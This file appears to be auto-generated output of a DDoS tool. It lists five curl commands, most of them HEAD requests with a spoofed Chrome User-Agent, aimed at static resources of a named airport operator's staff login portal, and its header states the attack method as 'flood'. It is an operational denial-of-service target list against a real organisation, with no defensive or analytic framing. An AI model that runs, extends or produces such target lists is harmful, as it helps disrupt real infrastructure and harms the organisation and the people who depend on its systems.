# DDoS Target cURL Commands
# Target: https://staffportal.airportthai.co.th/fo/account/login
# Hostname: staffportal.airportthai.co.th
# Attack Method: flood
# Generated: 2025-12-13T13:46:34+07:00
# Total valid endpoints: 5

curl \
  -X \
  HEAD \
  'https://staffportal.airportthai.co.th/fo/js/cookie.js' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://staffportal.airportthai.co.th/fo/resources/FileResource.js' \
  -H \
  'Content-Type: application/javascript' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://staffportal.airportthai.co.th/fo/images/login/login-name-as.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://staffportal.airportthai.co.th/fo/css/cookie.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://staffportal.airportthai.co.th/fo/themes/front/css/theme-dark.min.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

